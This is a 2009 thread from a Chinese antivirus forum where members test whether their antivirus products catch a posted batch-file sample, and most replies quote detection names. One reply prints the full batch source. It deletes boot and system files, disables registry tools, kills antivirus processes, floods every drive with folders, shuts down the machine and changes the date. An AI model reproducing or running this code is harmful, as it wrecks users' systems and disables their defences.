查看: 4546|回复: 22
收起左侧

[可疑文件] 可爱的批处理~(自己又修改了一下,变种见21楼)

[复制链接]
youba
发表于 2009-1-29 10:07:19 | 显示全部楼层 |阅读模式
全都0



更新日志和变种结果见21楼

[ 本帖最后由 youba 于 2009-2-27 11:44 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
saga3721
发表于 2009-1-29 10:11:31 | 显示全部楼层
'BDS/Killfiles.GA.1' [backdoor]
相随
发表于 2009-1-29 10:13:02 | 显示全部楼层
干掉微点的 就这个批处理也能干掉?
木马清道夫miss
fatezero
发表于 2009-1-29 10:27:05 | 显示全部楼层
发生下列错误:

请求的对象被感染,发现下列病毒 Trojan.BAT.KillFiles.ga
schumi小粉
发表于 2009-1-29 10:29:31 | 显示全部楼层
。。。直接拦截

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
残缺的唯美
发表于 2009-1-29 10:42:11 | 显示全部楼层
del c:\ntldr
del c:\*sys
@reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
taskkill /f /im MPSVC1.exe/t
taskkill /f /im MPSVC2.exe/t
taskkill /f /im MPSVC.exe/t
del C:\windows\*.exe
del C:\windows\system32\*.exe
del C:\windows\system32\*.cpl
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
for /l %%a in (1,1,1000) do for %%b in (%alldrive%) do md %%b:\%random%%random%%random%%%a..\
Shutdown
date 2099-10-10
Tynox
发表于 2009-1-29 10:48:44 | 显示全部楼层
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:         http://bbs.kafan.cn/attachment.p ... 3f&t=1233197292
Information:         Contains a recognition pattern of the (harmful) BDS/Killfiles.GA.1 back-door program

Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.60, VDF 7.1.1.197
Sherry.ai
发表于 2009-1-29 10:53:45 | 显示全部楼层
Ka8 直接Kill
Roboon
发表于 2009-1-29 11:10:01 | 显示全部楼层
Roboon:费尔 Trojan.BAT.KillFiles.ga.khvv
抓抓
发表于 2009-1-29 11:17:38 | 显示全部楼层
原帖由 za1012 于 2009-1-29 10:42 发表
del c:\ntldr
del c:\*sys
@reg  add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f
taskkill /f /im MPMon.exe /t
t ...


LZ的这个批处理的第二行应该是少写了一个点:del c:\*.sys

批处理这个东西如果也防不住的话,就没法说了。。
另外,最后一段光建立文件夹有什么意思??给你建立又怎样??有本事建立可执行文件啊。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-14 15:01 , Processed in 0.185589 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表